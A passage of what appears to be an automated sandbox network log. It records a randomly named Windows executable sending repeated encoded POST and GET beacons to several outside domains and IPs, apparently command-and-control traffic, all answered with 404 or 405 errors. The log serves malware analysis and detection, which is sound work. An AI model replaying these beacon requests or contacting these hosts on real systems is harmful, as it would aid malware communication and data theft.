                                                Dec 17, 2024 03:41:19.988773108 CET | 573 | IN | Data Raw: 79 20 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77
                                                Data Ascii: y bgcolor="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.brickhills.site/q6c0/?-V8=DNozHXZRHwMop+WB0qwfBKpxfEH+ejoTyKy7EOTXMNRX1xYPjRGOw4JAj4pefwWAxfS0q+PDkH37PQMlxyuVDnop3GMN8cH/UXRq5XDzrWyHO52OJthmQYZMV7gmULD6fQ==&


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                5 | 192.168.2.5 | 49844 | 199.15.251.162 | 80 | 4444 | C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 17, 2024 03:41:25.685750008 CET | 649 | OUT | POST /ocjg/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 204
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.pin-ballerz.net
                                                Origin: http://www.pin-ballerz.net
                                                Referer: http://www.pin-ballerz.net/ocjg/
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Raw: 2d 56 38 3d 43 75 79 45 55 33 55 49 35 53 77 2b 64 45 63 68 6b 6d 6e 33 64 71 30 76 35 51 4f 56 70 39 4b 31 64 67 65 4d 66 43 78 35 61 52 52 58 78 59 6c 55 50 66 4f 55 58 39 52 71 64 46 77 30 48 2f 50 66 47 41 62 6d 4a 59 65 59 76 79 6e 78 63 45 77 79 79 34 6a 7a 50 79 45 67 79 57 34 69 33 6e 4d 35 74 6b 65 79 50 36 6d 70 61 47 32 52 6d 69 57 4c 76 46 59 65 58 59 5a 4b 58 61 5a 41 6a 56 4c 33 35 35 57 43 30 76 74 52 4e 49 4b 65 38 6a 64 61 2f 6b 4f 74 71 4d 75 7a 69 4d 4e 55 76 4c 41 50 55 64 74 31 67 72 6f 4b 75 6e 76 79 52 52 74 46 30 72 52 77 72 73 34 36 62 74 75 46 67 75 63 54 6f 58 41 31 4d 75 77 3d
                                                Data Ascii: -V8=CuyEU3UI5Sw+dEchkmn3dq0v5QOVp9K1dgeMfCx5aRRXxYlUPfOUX9RqdFw0H/PfGAbmJYeYvynxcEwyy4jzPyEgyW4i3nM5tkeyP6mpaG2RmiWLvFYeXYZKXaZAjVL355WC0vtRNIKe8jda/kOtqMuziMNUvLAPUdt1groKunvyRRtF0rRwrs46btuFgucToXA1Muw=
                                                Dec 17, 2024 03:41:26.808120012 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                Date: Tue, 17 Dec 2024 02:41:26 GMT
                                                Server: Apache
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                6 | 192.168.2.5 | 49851 | 199.15.251.162 | 80 | 4444 | C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 17, 2024 03:41:28.342521906 CET | 669 | OUT | POST /ocjg/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 224
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.pin-ballerz.net
                                                Origin: http://www.pin-ballerz.net
                                                Referer: http://www.pin-ballerz.net/ocjg/
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Raw: 2d 56 38 3d 43 75 79 45 55 33 55 49 35 53 77 2b 66 67 67 68 69 46 50 33 4d 36 30 73 6c 41 4f 56 67 64 4c 38 64 67 61 4d 66 44 31 70 61 6b 35 58 77 37 78 55 4f 65 4f 55 61 64 52 71 56 6c 77 31 4b 66 50 51 47 42 6d 62 4a 5a 69 59 76 79 7a 78 63 45 67 79 79 4c 4c 73 4f 69 46 47 36 32 34 6b 70 58 4d 35 74 6b 65 79 50 37 43 50 61 47 75 52 6d 53 47 4c 70 58 77 52 55 59 5a 4a 51 61 5a 41 6e 56 4c 37 35 35 58 6c 30 75 68 33 4e 4b 69 65 38 6e 5a 61 2b 31 50 66 68 4d 76 34 6d 4d 4e 47 6d 37 55 44 54 72 6b 39 76 36 68 63 39 77 4b 48 5a 48 63 76 75 4a 5a 59 34 4d 55 43 4c 2b 6d 79 78 65 39 36 79 30 51 46 53 35 6d 42 6c 48 30 38 48 6d 32 41 4c 63 56 62 41 6a 50 2b 6c 39 49 68
                                                Data Ascii: -V8=CuyEU3UI5Sw+fgghiFP3M60slAOVgdL8dgaMfD1pak5Xw7xUOeOUadRqVlw1KfPQGBmbJZiYvyzxcEgyyLLsOiFG624kpXM5tkeyP7CPaGuRmSGLpXwRUYZJQaZAnVL755Xl0uh3NKie8nZa+1PfhMv4mMNGm7UDTrk9v6hc9wKHZHcvuJZY4MUCL+myxe96y0QFS5mBlH08Hm2ALcVbAjP+l9Ih
                                                Dec 17, 2024 03:41:29.469501019 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                Date: Tue, 17 Dec 2024 02:41:29 GMT
                                                Server: Apache
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                7 | 192.168.2.5 | 49857 | 199.15.251.162 | 80 | 4444 | C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 17, 2024 03:41:30.996507883 CET | 1686 | OUT | POST /ocjg/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 1240
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.pin-ballerz.net
                                                Origin: http://www.pin-ballerz.net
                                                Referer: http://www.pin-ballerz.net/ocjg/
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Raw: 2d 56 38 3d 43 75 79 45 55 33 55 49 35 53 77 2b 66 67 67 68 69 46 50 33 4d 36 30 73 6c 41 4f 56 67 64 4c 38 64 67 61 4d 66 44 31 70 61 69 68 58 77 4c 74 55 50 39 32 55 62 64 52 71 62 46 77 4f 4b 66 50 33 47 41 4f 58 4a 5a 75 79 76 30 33 78 64 6e 34 79 36 61 4c 73 62 79 46 47 34 32 34 68 33 6e 4d 73 74 6b 50 37 50 36 79 50 61 47 75 52 6d 55 69 4c 34 46 59 52 62 34 5a 4b 58 61 5a 45 6a 56 4c 66 35 35 50 66 30 75 6c 42 4e 36 43 65 38 48 4a 61 38 48 58 66 73 4d 76 36 71 73 4d 56 6d 37 4a 64 54 71 4e 45 76 36 56 6c 39 32 36 48 5a 47 39 37 36 4c 78 44 6b 76 73 63 48 70 79 44 67 4c 52 6b 38 6b 59 43 64 72 75 46 68 6b 73 35 4f 68 79 35 4e 2f 34 43 65 6d 7a 35 31 5a 5a 62 77 39 66 67 45 78 32 34 49 76 54 74 4d 4e 42 66 46 39 71 4f 4b 45 52 45 6c 57 69 4f 36 6c 49 43 75 6d 78 74 46 56 61 7a 46 79 63 46 56 32 55 36 6c 49 71 71 30 67 32 56 36 4d 6e 38 2f 76 6d 67 70 36 75 5a 66 70 64 32 58 67 62 39 6e 63 62 38 78 77 69 46 41 49 6f 69 51 70 36 67 58 70 6b 7a 6c 7a 75 46 57 64 49 30 67 49 44 72 32 6b 6b 32 69 58 [TRUNCATED]
                                                Data Ascii: -V8= [TRUNCATED]
                                                Dec 17, 2024 03:41:32.091340065 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                Date: Tue, 17 Dec 2024 02:41:31 GMT
                                                Server: Apache
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                8 | 192.168.2.5 | 49863 | 199.15.251.162 | 80 | 4444 | C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 17, 2024 03:41:33.653446913 CET | 388 | OUT | GET /ocjg/?-V8=PsakXBZzgyoVbyp2hjDhUIAPjymto9iGXnTsMAFbSxg7wqJ/GaGLf9R1SWA0D+LwAwOTNpeqtTSBVw9+2LbbbxVu9AMo8WkIslXiFZquUVbpmyTV+kMBZINqQZENrlqOtg==&2H=b6QHb8C0WpQhtV HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Connection: close
                                                Host: www.pin-ballerz.net
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Dec 17, 2024 03:41:34.752705097 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                Date: Tue, 17 Dec 2024 02:41:34 GMT
                                                Server: Apache
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                9 | 192.168.2.5 | 49879 | 199.193.6.134 | 80 | 4444 | C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 17, 2024 03:41:41.013180017 CET | 640 | OUT | POST /83oq/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 204
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.allstary.top
                                                Origin: http://www.allstary.top
                                                Referer: http://www.allstary.top/83oq/
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Raw: 2d 56 38 3d 6a 4d 6c 62 56 41 54 78 68 48 57 4d 4d 62 47 44 64 63 52 31 58 4b 4b 6d 44 38 42 45 6d 6a 67 2f 64 38 5a 70 59 45 55 2f 42 61 71 6d 41 47 78 58 33 38 62 74 2f 32 33 52 41 77 58 36 41 35 33 49 61 6a 79 39 68 34 64 6e 48 48 62 33 77 31 38 6b 66 4b 39 61 56 4e 45 45 4e 46 67 76 53 33 74 4a 45 47 50 48 49 4b 4f 72 52 67 72 42 41 4a 58 4a 52 4e 71 78 54 79 53 76 30 70 52 49 34 6f 67 4c 78 5a 51 6c 55 2b 42 58 4e 53 30 75 6f 6f 61 6e 59 51 71 57 36 79 38 72 6c 35 57 64 79 33 31 4e 4d 70 73 70 37 55 4f 67 32 51 69 6d 6a 65 39 6c 69 33 47 67 70 76 66 54 2b 30 37 76 73 6c 34 62 35 64 62 30 76 2f 55 3d
                                                Data Ascii: -V8=jMlbVATxhHWMMbGDdcR1XKKmD8BEmjg/d8ZpYEU/BaqmAGxX38bt/23RAwX6A53Iajy9h4dnHHb3w18kfK9aVNEENFgvS3tJEGPHIKOrRgrBAJXJRNqxTySv0pRI4ogLxZQlU+BXNS0uooanYQqW6y8rl5Wdy31NMpsp7UOg2Qimje9li3GgpvfT+07vsl4b5db0v/U=
                                                Dec 17, 2024 03:41:42.257824898 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                Date: Tue, 17 Dec 2024 02:41:42 GMT
                                                Server: Apache
                                                Content-Length: 389
                                                Connection: close
                                                Content-Type: text/html
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                10 | 192.168.2.5 | 49886 | 199.193.6.134 | 80 | 4444 | C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 17, 2024 03:41:43.677175999 CET | 660 | OUT | POST /83oq/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 224
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.allstary.top
                                                Origin: http://www.allstary.top
                                                Referer: http://www.allstary.top/83oq/
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Ascii: -V8=jMlbVATxhHWMO72Dc/51fKKlPcBEzzh2d8VpYG56Bo+mBnBX0+jt+23RLQXjE53TajuDh7FnHD73w3kkc9hVXdEGFlgtPHtJEGPHILqNRkHBAYnJToK2aSTd9JRIvYg1xZR2U/dxNQMuorOnWhqVxy8t9ZXdiD5CLLkG6WKmvRqArIMP4VOI6PzrunzY9VZyj+LExoAGIL2FjlCOioR4O2+E3WBF
                                                Dec 17, 2024 03:41:44.910455942 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                Date: Tue, 17 Dec 2024 02:41:44 GMT
                                                Server: Apache
                                                Content-Length: 389
                                                Connection: close
                                                Content-Type: text/html
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                11 | 192.168.2.5 | 49892 | 199.193.6.134 | 80 | 4444 | C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 17, 2024 03:41:46.353830099 CET | 1677 | OUT | POST /83oq/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 1240
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.allstary.top
                                                Origin: http://www.allstary.top
                                                Referer: http://www.allstary.top/83oq/
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Ascii: -V8=jMlbVATxhHWMO72Dc/51fKKlPcBEzzh2d8VpYG56BommAR9X0ZPt923RGwXmE52Jajmfh7J3HF33wS4kZIVVddEGHlgsS3tmEGf9IKaNRkHBAb/JX9q2YSSv0pRE4ogOxZIDU/ZHOhsuoNunazSVuC8voZXziEwCLP8g6X/xvWuAhJhzq3aOiuT3oUzfkloRr43o84hhUZi4pSOf3oZoSD+P7SodVzAU9iUnQqVVXMwR5U7PciR6FiEVZZ13nEA4gyvXrQ2tdFsDtvSd2fYDIFtbmyXsTqbzuWY85PaLU0piTyiWiR/yeE/aU0ERjLClZsJ5YkwOBLZ9oDNihX7wflF/OoHBDesqfRP2F0t/Oq7QnJ78bb5gR7DLMX4cvcPFU3+B1wQ2ZapLG3kvyg2Hi7Bhr7Y+9Y6PJCznDKnv4RzFGOUvDPi8GaFZdpt3fDdQJKdd7hAM80IrWewEf3j+Y4pMyRCwre0rW3No/Gpzj22iUOBy/2R8MKgS+onC0yXwsuZBxE8gyuVUH9cO5ZNaVbMBJIPAPXSAi9Rs5nvHpOxLi0GAkhBRZuOXjPa2dHsYj/p5wYVjaHahqZovFQIZ7M6sxgnunS1dwqvcT2obZg4zTfhWdFI3DBTGO3hE7cp37Am35Ry7zy8RIK3YS8CKOOAtomQQa8xluy0HyXI7R3obPDSivOYSuGBsIJ/7VU38+yua2CENuBB9rEzCfs41US6LRPE0st9dvuXQqf0B9hito5lqljW4Ch1poiSLVFLwnDlCYu8kvVy19zq7znzJtSpwXjdGeL2VATzumoOv22lT8eE9f0hw4T3Z862Vt9kftyMX5yw3E/noIPI9qXHswK2jUPN7ihK+4Zycj3pI2QLjk5K2URaw0aBv8qBGmP/Qc3X+cTkK61TlzQIBNMJdFM1kl5yxy9XkHgBoUlw3eWWhpsjU7ecXAyimFlaX1d5dTstrCYsi5SKYdxOqqAWcvCmpZuRmkIn2IA7q7wspdLiZ+Pfe [TRUNCATED]
                                                Dec 17, 2024 03:41:47.563179016 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                Date: Tue, 17 Dec 2024 02:41:47 GMT
                                                Server: Apache
                                                Content-Length: 389
                                                Connection: close
                                                Content-Type: text/html
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                12 | 192.168.2.5 | 49902 | 199.193.6.134 | 80 | 4444 | C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 17, 2024 03:41:49.013583899 CET | 385 | OUT | GET /83oq/?-V8=uON7WwvftimkH6+9fo1haamOfON2rQIMUfJSLV47BI3eNmd69pzs52jdBx/JPqPeVCXck41+K0Sv6SgSfr5VB9MDDVgyHUBPcljHHq+Df2KeZsyLZPWCaDvb78l21qpsnQ==&2H=b6QHb8C0WpQhtV HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Connection: close
                                                Host: www.allstary.top
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Dec 17, 2024 03:41:50.236946106 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                Date: Tue, 17 Dec 2024 02:41:50 GMT
                                                Server: Apache
                                                Content-Length: 389
                                                Connection: close
                                                Content-Type: text/html; charset=utf-8
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                13 | 192.168.2.5 | 49918 | 52.60.87.163 | 80 | 4444 | C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 17, 2024 03:41:56.111262083 CET | 649 | OUT | POST /nydx/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 204
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.waytoocool.life
                                                Origin: http://www.waytoocool.life
                                                Referer: http://www.waytoocool.life/nydx/
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Ascii: -V8=n5PTG5vOd7NNF4AEvBLKR8onCIHfEt1I3Et+5aTMFmHQjQYNYIPirlvNc7DISskrVNswSoEif7MFoQoLmvHN1zv17WLNKpCXbd5jQU5fP9KHl4AmMpMDYANzXp8Rdyoro/qjUuZWHHz6UXYuhNAR2Dj99Bg4QRYyNVwqna3Jq3zv/HVg/BnJyMpVTlYsgNoCg8+5q8M=
                                                Dec 17, 2024 03:41:57.208544016 CET | 295 | IN | HTTP/1.1 405 Not Allowed
                                                Server: nginx
                                                Date: Tue, 17 Dec 2024 02:41:57 GMT
                                                Content-Type: text/html
                                                Content-Length: 150
                                                Connection: close
                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                14 | 192.168.2.5 | 49924 | 52.60.87.163 | 80 | 4444 | C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
